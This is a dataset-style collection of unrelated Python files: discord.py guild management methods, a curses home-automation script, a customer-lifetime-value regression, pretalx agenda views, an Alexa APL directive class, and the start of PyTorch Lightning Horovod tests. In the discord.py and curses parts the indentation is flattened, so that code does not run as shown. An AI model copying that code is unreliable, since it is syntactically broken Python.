You must have the :attr:`~Permissions.manage_guild` permission to get
this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
-------
List[:class:`Invite`]
The list of invites that are currently active.
"""
data = await self._state.http.invites_from(self.id)
result = []
for invite in data:
channel = self.get_channel(int(invite['channel']['id']))
invite['channel'] = channel
invite['guild'] = self
result.append(Invite(state=self._state, data=invite))
return result
async def create_template(self, *, name, description=None):
"""|coro|
Creates a template for the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.7
Parameters
-----------
name: :class:`str`
The name of the template.
description: Optional[:class:`str`]
The description of the template.
"""
from .template import Template
payload = {
'name': name
}
if description:
payload['description'] = description
data = await self._state.http.create_template(self.id, payload)
return Template(state=self._state, data=data)
async def create_integration(self, *, type, id):
"""|coro|
Attaches an integration to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Parameters
-----------
type: :class:`str`
The integration type (e.g. Twitch).
id: :class:`int`
The integration ID.
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
The account could not be found.
"""
await self._state.http.create_integration(self.id, type, id)
async def integrations(self):
"""|coro|
Returns a list of all integrations attached to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
Fetching the integrations failed.
Returns
--------
List[:class:`Integration`]
The list of integrations that are attached to the guild.
"""
data = await self._state.http.get_all_integrations(self.id)
return [Integration(guild=self, data=d) for d in data]
async def fetch_emojis(self):
r"""|coro|
Retrieves all custom :class:`Emoji`\s from the guild.
.. note::
This method is an API call. For general usage, consider :attr:`emojis` instead.
Raises
---------
HTTPException
An error occurred fetching the emojis.
Returns
--------
List[:class:`Emoji`]
The retrieved emojis.
"""
data = await self._state.http.get_all_custom_emojis(self.id)
return [Emoji(guild=self, state=self._state, data=d) for d in data]
async def fetch_emoji(self, emoji_id):
"""|coro|
Retrieves a custom :class:`Emoji` from the guild.
.. note::
This method is an API call.
For general usage, consider iterating over :attr:`emojis` instead.
Parameters
-------------
emoji_id: :class:`int`
The emoji's ID.
Raises
---------
NotFound
The emoji requested could not be found.
HTTPException
An error occurred fetching the emoji.
Returns
--------
:class:`Emoji`
The retrieved emoji.
"""
data = await self._state.http.get_custom_emoji(self.id, emoji_id)
return Emoji(guild=self, state=self._state, data=data)
async def create_custom_emoji(self, *, name, image, roles=None, reason=None):
r"""|coro|
Creates a custom :class:`Emoji` for the guild.
There is currently a limit of 50 static and animated emojis respectively per guild,
unless the guild has the ``MORE_EMOJI`` feature which extends the limit to 200.
You must have the :attr:`~Permissions.manage_emojis` permission to
do this.
Parameters
-----------
name: :class:`str`
The emoji name. Must be at least 2 characters.
image: :class:`bytes`
The :term:`py:bytes-like object` representing the image data to use.
Only JPG, PNG and GIF images are supported.
roles: Optional[List[:class:`Role`]]
A :class:`list` of :class:`Role`\s that can use this emoji. Leave empty to make it available to everyone.
reason: Optional[:class:`str`]
The reason for creating this emoji. Shows up on the audit log.
Raises
-------
Forbidden
You are not allowed to create emojis.
HTTPException
An error occurred creating an emoji.
Returns
--------
:class:`Emoji`
The created emoji.
"""
img = utils._bytes_to_base64_data(image)
if roles:
roles = [role.id for role in roles]
data = await self._state.http.create_custom_emoji(self.id, name, img, roles=roles, reason=reason)
return self._state.store_emoji(self, data)
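    # Illustrative usage sketch (editor's note, not part of discord.py): ``image`` is the
    # raw bytes of a PNG/JPG/GIF file, not a path or a URL.
    #
    #     with open('thonk.png', 'rb') as fp:
    #         emoji = await guild.create_custom_emoji(name='thonk', image=fp.read(),
    #                                                 reason='Requested by the mod team')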
async def fetch_roles(self):
"""|coro|
Retrieves all :class:`Role` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`roles` instead.
.. versionadded:: 1.3
Raises
-------
HTTPException
Retrieving the roles failed.
Returns
-------
List[:class:`Role`]
All roles in the guild.
"""
data = await self._state.http.get_roles(self.id)
return [Role(guild=self, state=self._state, data=d) for d in data]
async def create_role(self, *, reason=None, **fields):
"""|coro|
Creates a :class:`Role` for the guild.
All fields are optional.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionchanged:: 1.6
Can now pass ``int`` to ``colour`` keyword-only parameter.
Parameters
-----------
name: :class:`str`
The role name. Defaults to 'new role'.
permissions: :class:`Permissions`
The permissions to have. Defaults to no permissions.
colour: Union[:class:`Colour`, :class:`int`]
The colour for the role. Defaults to :meth:`Colour.default`.
This is aliased to ``color`` as well.
hoist: :class:`bool`
Indicates if the role should be shown separately in the member list.
Defaults to ``False``.
mentionable: :class:`bool`
Indicates if the role should be mentionable by others.
Defaults to ``False``.
reason: Optional[:class:`str`]
The reason for creating this role. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to create the role.
HTTPException
Creating the role failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
:class:`Role`
The newly created role.
"""
try:
perms = fields.pop('permissions')
except KeyError:
fields['permissions'] = '0'
else:
fields['permissions'] = str(perms.value)
try:
colour = fields.pop('colour')
except KeyError:
colour = fields.get('color', Colour.default())
finally:
if isinstance(colour, int):
colour = Colour(value=colour)
fields['color'] = colour.value
valid_keys = ('name', 'permissions', 'color', 'hoist', 'mentionable')
for key in fields:
if key not in valid_keys:
raise InvalidArgument(f'{key!r} is not a valid field.')
data = await self._state.http.create_role(self.id, reason=reason, **fields)
role = Role(guild=self, data=data, state=self._state)
# TODO: add to cache
return role
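    # Illustrative usage sketch (editor's note, not part of discord.py): only the keys in
    # ``valid_keys`` above are accepted; colour may be a Colour instance or a plain int.
    #
    #     role = await guild.create_role(name='Moderator',
    #                                    permissions=discord.Permissions(kick_members=True,
    #                                                                    ban_members=True),
    #                                    colour=discord.Colour.dark_teal(),
    #                                    hoist=True,
    #                                    reason='Setting up moderation')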
async def edit_role_positions(self, positions, *, reason=None):
"""|coro|
Bulk edits a list of :class:`Role` in the guild.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionadded:: 1.4
Example:
.. code-block:: python3
positions = {
bots_role: 1, # penultimate role
tester_role: 2,
admin_role: 6
}
await guild.edit_role_positions(positions=positions)
Parameters
-----------
positions
A :class:`dict` of :class:`Role` to :class:`int` to change the positions
of each given role.
reason: Optional[:class:`str`]
The reason for editing the role positions. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to move the roles.
HTTPException
Moving the roles failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
List[:class:`Role`]
A list of all the roles in the guild.
"""
if not isinstance(positions, dict):
raise InvalidArgument('positions parameter expects a dict.')
role_positions = []
for role, position in positions.items():
payload = {
'id': role.id,
'position': position
}
role_positions.append(payload)
data = await self._state.http.move_role_position(self.id, role_positions, reason=reason)
roles = []
for d in data:
role = Role(guild=self, data=d, state=self._state)
roles.append(role)
self._roles[role.id] = role
return roles
async def kick(self, user, *, reason=None):
"""|coro|
Kicks a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.kick_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to kick from their guild.
reason: Optional[:class:`str`]
The reason the user got kicked.
Raises
-------
Forbidden
You do not have the proper permissions to kick.
HTTPException
Kicking failed.
"""
await self._state.http.kick(user.id, self.id, reason=reason)
async def ban(self, user, *, reason=None, delete_message_days=1):
"""|coro|
Bans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to ban from their guild.
delete_message_days: :class:`int`
The number of days worth of messages to delete from the user
in the guild. The minimum is 0 and the maximum is 7.
reason: Optional[:class:`str`]
The reason the user got banned.
Raises
-------
Forbidden
You do not have the proper permissions to ban.
HTTPException
Banning failed.
"""
await self._state.http.ban(user.id, self.id, delete_message_days, reason=reason)
async def unban(self, user, *, reason=None):
"""|coro|
Unbans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to unban.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to unban.
HTTPException
Unbanning failed.
"""
await self._state.http.unban(user.id, self.id, reason=reason)
async def vanity_invite(self) -> Invite:
"""|coro|
Returns the guild's special vanity invite.
The guild must have ``VANITY_URL`` in :attr:`~Guild.features`.
You must have the :attr:`~Permissions.manage_guild` permission to use
this as well.
Raises
-------
Forbidden
You do not have the proper permissions to get this.
HTTPException
Retrieving the vanity invite failed.
Returns
--------
:class:`Invite`
The special vanity invite.
"""
# we start with { code: abc }
payload = await self._state.http.get_vanity_code(self.id)
# get the vanity URL channel since default channels aren't
# reliable or a thing anymore
data = await self._state.http.get_invite(payload['code'])
payload['guild'] = self
payload['channel'] = self.get_channel(int(data['channel']['id']))
payload['revoked'] = False
payload['temporary'] = False
payload['max_uses'] = 0
payload['max_age'] = 0
return Invite(state=self._state, data=payload)
def audit_logs(self, *, limit=100, before=None, after=None, oldest_first=None, user=None, action=None):
"""Returns an :class:`AsyncIterator` that enables receiving the guild's audit logs.
You must have the :attr:`~Permissions.view_audit_log` permission to use this.
Examples
----------
Getting the first 100 entries: ::
async for entry in guild.audit_logs(limit=100):
print(f'{entry.user} did {entry.action} to {entry.target}')
Getting entries for a specific action: ::
async for entry in guild.audit_logs(action=discord.AuditLogAction.ban):
print(f'{entry.user} banned {entry.target}')
Getting entries made by a specific user: ::
entries = await guild.audit_logs(limit=None, user=guild.me).flatten()
await channel.send(f'I made {len(entries)} moderation actions.')
Parameters
-----------
limit: Optional[:class:`int`]
The number of entries to retrieve. If ``None`` retrieve all entries.
before: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries before this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
after: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries after this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
oldest_first: :class:`bool`
If set to ``True``, return entries in oldest->newest order. Defaults to ``True`` if
``after`` is specified, otherwise ``False``.
user: :class:`abc.Snowflake`
The moderator to filter entries from.
action: :class:`AuditLogAction`
The action to filter with.
Raises
-------
Forbidden
You are not allowed to fetch audit logs
HTTPException
An error occurred while fetching the audit logs.
Yields
--------
:class:`AuditLogEntry`
The audit log entry.
"""
if user:
user = user.id
if action:
action = action.value
return AuditLogIterator(self, before=before, after=after, limit=limit,
oldest_first=oldest_first, user_id=user, action_type=action)
async def widget(self):
"""|coro|
Returns the widget of the guild.
.. note::
The guild must have the widget enabled to get this information.
Raises
-------
Forbidden
The widget for this guild is disabled.
HTTPException
Retrieving the widget failed.
Returns
--------
:class:`Widget`
The guild's widget.
"""
data = await self._state.http.get_widget(self.id)
return Widget(state=self._state, data=data)
async def chunk(self, *, cache=True):
"""|coro|
Requests all members that belong to this guild. In order to use this,
:meth:`Intents.members` must be enabled.
This is a websocket operation and can be slow.
.. versionadded:: 1.5
Parameters
-----------
cache: :class:`bool`
Whether to cache the members as well.
Raises
-------
ClientException
The members intent is not enabled.
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return await self._state.chunk_guild(self, cache=cache)
async def query_members(self, query=None, *, limit=5, user_ids=None, presences=False, cache=True):
"""|coro|
Request members that belong to this guild whose username starts with
the query given.
This is a websocket operation and can be slow.
.. versionadded:: 1.3
Parameters
-----------
query: Optional[:class:`str`]
            The string that the usernames start with.
limit: :class:`int`
The maximum number of members to send back. This must be
a number between 5 and 100.
presences: :class:`bool`
Whether to request for presences to be provided. This defaults
to ``False``.
.. versionadded:: 1.6
cache: :class:`bool`
Whether to cache the members internally. This makes operations
such as :meth:`get_member` work for those that matched.
user_ids: Optional[List[:class:`int`]]
List of user IDs to search for. If the user ID is not in the guild then it won't be returned.
.. versionadded:: 1.4
Raises
-------
asyncio.TimeoutError
The query timed out waiting for the members.
ValueError
Invalid parameters were passed to the function
ClientException
The presences intent is not enabled.
Returns
--------
List[:class:`Member`]
The list of members that have matched the query.
"""
if presences and not self._state._intents.presences:
raise ClientException('Intents.presences must be enabled to use this.')
        if query is None:
            if user_ids is None:
                raise ValueError('Must pass either query or user_ids')
        elif query == '':
            raise ValueError('Cannot pass empty query string.')
if user_ids is not None and query is not None:
raise ValueError('Cannot pass both query and user_ids')
if user_ids is not None and not user_ids:
raise ValueError('user_ids must contain at least 1 value')
limit = min(100, limit or 5)
return await self._state.query_members(self, query=query, limit=limit, user_ids=user_ids, presences=presences, cache=cache)
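    # Illustrative usage sketch (editor's note, not part of discord.py): query by name
    # prefix or by explicit IDs, but never both in the same call (see the checks above).
    #
    #     members = await guild.query_members(query='Dan', limit=10)
    #     members = await guild.query_members(user_ids=[123456789012345678], presences=False)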
async def change_voice_state(self, *, channel, self_mute=False, self_deaf=False):
"""|coro|
Changes client's voice state in the guild.
.. versionadded:: 1.4
Parameters
-----------
channel: Optional[:class:`VoiceChannel`]
Channel the client wants to join. Use ``None`` to disconnect.
self_mute: :class:`bool`
Indicates if the client should be self-muted.
self_deaf: :class:`bool`
Indicates if the client should be self-deafened.
"""
ws = self._state._get_websocket(self.id)
channel_id = channel.id if channel else None
await ws.voice_state(self.id, channel_id, self_mute, self_deaf)
|
the-stack_0_3748 | #!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos : int, length : int, instructions = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
    string = screen.getstr(y_pos, 0, length)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cômodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"digite o nome do cômodo")
input_device = input_str(screen,2,50,"digite o nome do dispositivo de entrada")
output_device = input_str(screen,2,50,"digite o nome do dispositivo de saída")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"digite 1 para definir o dispositivo ou 0 para usar o padrão")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"digite a matricula")
mac = input_str(screen,2,50,"digite o endereço mac")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "digite o nome do cômodo")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme não foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
            # deallocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug raising the error
raise err
curses.endwin()
try:
        # deallocating memory
room_devices.alarm_handle.close()
except:
pass
|
the-stack_0_3752 | # Predicting Customer Lifetime Value
## Loading and Viewing Data
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import os
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import sklearn.metrics
raw_data = pd.read_csv("history.csv")
print(raw_data.dtypes)
print(raw_data.head(5))
## Do Correlation Analysis
cleaned_data = raw_data.drop("CUST_ID", axis=1)
print(cleaned_data.corr()['CLV'])
## Do Training and Testing Split
# Let us split the data into training and testing datasets in the ratio 90:10.
predictors = cleaned_data.drop("CLV",axis=1)
targets = cleaned_data.CLV
pred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.1)
print( "Predictor - Training : ", pred_train.shape, "Predictor - Testing : ", pred_test.shape )
## Build and Test Model
# Build model on training data
model = LinearRegression()
model.fit(pred_train,tar_train)
print("Coefficients: \n", model.coef_)
print("Intercept:", model.intercept_)
# Test on testing data
predictions = model.predict(pred_test)
print(predictions)
print("R-squared on test data:", sklearn.metrics.r2_score(tar_test, predictions))
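# Additional error metrics on the same held-out data (editor's illustrative addition;
# both helpers come from the sklearn.metrics module imported above).
print("MAE :", sklearn.metrics.mean_absolute_error(tar_test, predictions))
print("RMSE:", np.sqrt(sklearn.metrics.mean_squared_error(tar_test, predictions)))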
## Predicting for a new Customer
new_data = np.array([100,0,50,0,0,0]).reshape(1, -1)
new_pred=model.predict(new_data)
print("The CLV for the new customer is : $",new_pred[0]) |
the-stack_0_3754 | from contextlib import suppress
from urllib.parse import urlparse
import vobject
from django.conf import settings
from django.contrib import messages
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.shortcuts import render
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView
from pretalx.agenda.signals import register_recording_provider
from pretalx.cfp.views.event import EventPageMixin
from pretalx.common.mixins.views import (
EventPermissionRequired, Filterable, PermissionRequired,
)
from pretalx.common.phrases import phrases
from pretalx.person.models.profile import SpeakerProfile
from pretalx.schedule.models import Schedule, TalkSlot
from pretalx.submission.forms import FeedbackForm
from pretalx.submission.models import Feedback, QuestionTarget, Submission
class TalkList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'talks'
model = Submission
template_name = 'agenda/talks.html'
permission_required = 'agenda.view_schedule'
default_filters = ('speakers__name__icontains', 'title__icontains')
def get_queryset(self):
return self.filter_queryset(self.request.event.talks).distinct()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class SpeakerList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'speakers'
template_name = 'agenda/speakers.html'
permission_required = 'agenda.view_schedule'
default_filters = ('user__name__icontains',)
def get_queryset(self):
qs = SpeakerProfile.objects.filter(
user__in=self.request.event.speakers, event=self.request.event
).select_related('user', 'event')
return self.filter_queryset(qs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class TalkView(PermissionRequired, DetailView):
context_object_name = 'submission'
model = Submission
slug_field = 'code'
template_name = 'agenda/talk.html'
permission_required = 'agenda.view_slot'
def get_object(self, queryset=None):
with suppress(AttributeError, Submission.DoesNotExist):
return self.request.event.talks.get(
code__iexact=self.kwargs['slug'],
)
if getattr(self.request, 'is_orga', False):
talk = self.request.event.wip_schedule.talks.filter(
submission__code__iexact=self.kwargs['slug'], is_visible=True
).first()
if talk:
return talk.submission
raise Http404()
@cached_property
def recording(self):
for receiver, response in register_recording_provider.send_robust(
self.request.event
):
if (
response
and not isinstance(response, Exception)
and hasattr(response, 'get_recording')
):
recording = response.get_recording(self.object)
if recording and recording['iframe']:
return recording
else:
print(response)
if self.object.rendered_recording_iframe:
return {
'iframe': self.object.rendered_recording_iframe,
'csp_header': 'https://media.ccc.de',
}
return {}
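    # Illustrative sketch (editor's note, hypothetical plugin code, not part of pretalx):
    # a receiver hooked to ``register_recording_provider`` returns an object whose
    # ``get_recording(submission)`` supplies the iframe markup and an optional CSP host,
    # which is exactly what the property above consumes.
    #
    #     from django.dispatch import receiver
    #
    #     @receiver(register_recording_provider)
    #     def recording_provider(sender, **kwargs):
    #         class Provider:
    #             def get_recording(self, submission):
    #                 return {'iframe': '<iframe src="https://media.example.com/talk"></iframe>',
    #                         'csp_header': 'https://media.example.com'}
    #         return Provider()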
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
if self.recording.get('csp_header'):
response._csp_update = {'child-src': self.recording.get('csp_header')}
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
qs = TalkSlot.objects.none()
schedule = Schedule.objects.none()
submission = self.object
if self.request.event.current_schedule:
schedule = self.request.event.current_schedule
qs = schedule.talks.filter(is_visible=True)
elif self.request.is_orga:
schedule = self.request.event.wip_schedule
qs = schedule.talks.all()
context['talk_slots'] = qs.filter(submission=submission).order_by('start')
context['submission_description'] = (
submission.description
or submission.abstract
or _('The talk »{title}« at {event}').format(
title=submission.title, event=submission.event.name
)
)
context['recording_iframe'] = self.recording.get('iframe')
context['answers'] = submission.answers.filter(
question__is_public=True,
question__event=self.request.event,
question__target=QuestionTarget.SUBMISSION,
)
context['speakers'] = []
other_submissions = schedule.slots.exclude(pk=submission.pk)
for speaker in submission.speakers.all():
speaker.talk_profile = speaker.event_profile(event=self.request.event)
speaker.other_submissions = other_submissions.filter(speakers__in=[speaker])
context['speakers'].append(speaker)
return context
class TalkReviewView(DetailView):
model = Submission
slug_field = 'review_code'
template_name = 'agenda/talk.html'
class SingleICalView(EventPageMixin, DetailView):
model = Submission
slug_field = 'code'
def get(self, request, event, **kwargs):
talk = (
self.get_object()
.slots.filter(schedule=self.request.event.current_schedule, is_visible=True)
.first()
)
if not talk:
raise Http404()
netloc = urlparse(settings.SITE_URL).netloc
cal = vobject.iCalendar()
cal.add('prodid').value = '-//pretalx//{}//{}'.format(
netloc, talk.submission.code
)
talk.build_ical(cal)
code = talk.submission.code
resp = HttpResponse(cal.serialize(), content_type='text/calendar')
resp[
'Content-Disposition'
] = f'attachment; filename="{request.event.slug}-{code}.ics"'
return resp
class FeedbackView(PermissionRequired, FormView):
model = Feedback
form_class = FeedbackForm
template_name = 'agenda/feedback_form.html'
permission_required = 'agenda.give_feedback'
def get_object(self):
return Submission.objects.filter(
event=self.request.event,
code__iexact=self.kwargs['slug'],
slots__in=self.request.event.current_schedule.talks.filter(is_visible=True),
).first()
def get(self, *args, **kwargs):
talk = self.get_object()
if talk and self.request.user in talk.speakers.all():
return render(
self.request,
'agenda/feedback.html',
context={
'talk': talk,
'feedback': talk.feedback.filter(
Q(speaker__isnull=True) | Q(speaker=self.request.user)
),
},
)
return super().get(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['talk'] = self.get_object()
return kwargs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['talk'] = self.get_object()
return context
def form_valid(self, form):
result = super().form_valid(form)
form.save()
messages.success(self.request, phrases.agenda.feedback_success)
return result
def get_success_url(self):
return self.get_object().urls.public
|
the-stack_0_3755 | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
from ask_sdk_model.directive import Directive
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
class RenderDocumentDirective(Directive):
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
deserialized_types = {
'object_type': 'str',
'token': 'str',
'document': 'dict(str, object)',
'datasources': 'dict(str, object)',
'packages': 'list[object]'
}
attribute_map = {
'object_type': 'type',
'token': 'token',
'document': 'document',
'datasources': 'datasources',
'packages': 'packages'
}
def __init__(self, token=None, document=None, datasources=None, packages=None):
# type: (Optional[str], Optional[Dict[str, object]], Optional[Dict[str, object]], Optional[List[object]]) -> None
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
self.__discriminator_value = "Alexa.Presentation.APL.RenderDocument"
self.object_type = self.__discriminator_value
super(RenderDocumentDirective, self).__init__(object_type=self.__discriminator_value)
self.token = token
self.document = document
self.datasources = datasources
self.packages = packages
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, RenderDocumentDirective):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
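    # Illustrative construction sketch (editor's note; the APL document shown is a
    # hypothetical minimal example, not taken from the SDK documentation):
    #
    #     directive = RenderDocumentDirective(
    #         token='helloToken',
    #         document={'type': 'APL', 'version': '1.1', 'mainTemplate': {'items': []}},
    #         datasources={'data': {'title': 'Hello, APL'}},
    #     )
    #     directive.object_type   # -> 'Alexa.Presentation.APL.RenderDocument'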
|
the-stack_0_3757 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import platform
import shlex
import subprocess
import sys
import numpy as np
import pytest
import torch
from sklearn.metrics import accuracy_score
import tests.base.develop_pipelines as tpipes
import tests.base.develop_utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.horovod_accelerator import HorovodAccelerator
from pytorch_lightning.core.step_result import EvalResult, Result, TrainResult
from pytorch_lightning.metrics.classification.accuracy import Accuracy
from pytorch_lightning.utilities import APEX_AVAILABLE, NATIVE_AMP_AVAILABLE, HOROVOD_AVAILABLE, _module_available
from tests.base import EvalModelTemplate
from tests.base.boring_model import BoringModel
from tests.base.models import BasicGAN
if HOROVOD_AVAILABLE:
import horovod
import horovod.torch as hvd
# This script will run the actual test model training in parallel
TEST_SCRIPT = os.path.join(os.path.dirname(__file__), 'data', 'horovod', 'train_default_model.py')
try:
    from horovod.common.util import nccl_built
    nccl_built()
except (ImportError, ModuleNotFoundError, AttributeError):
    HOROVOD_NCCL_AVAILABLE = False
else:
    HOROVOD_NCCL_AVAILABLE = True
def _run_horovod(trainer_options, on_gpu=False):
"""Execute the training script across multiple workers in parallel."""
num_processes = trainer_options.get('gpus', 2)
# for Horovod, we interpret `gpus` to be set per worker
trainer_options.update(gpus=1 if on_gpu else None)
tutils.reset_seed()
cmdline = [
'horovodrun',
'-np', str(num_processes),
sys.executable, TEST_SCRIPT,
'--trainer-options', shlex.quote(json.dumps(trainer_options))
]
if on_gpu:
cmdline += ['--on-gpu']
exit_code = subprocess.call(' '.join(cmdline), shell=True, env=os.environ.copy())
assert exit_code == 0
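# For reference (editor's note): the subprocess above spawns something equivalent to the
# following shell command; the -np count and trainer options shown here are illustrative.
#
#     horovodrun -np 2 python .../data/horovod/train_default_model.py \
#         --trainer-options '{"max_epochs": 1, "limit_train_batches": 0.4}' --on-gpu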
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu(enable_pl_optimizer, tmpdir):
"""Test Horovod running multi-process on CPU."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
distributed_backend='horovod',
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu_implicit(enable_pl_optimizer, tmpdir):
"""Test Horovod without specifying a backend, inferring from env set by `horovodrun`."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
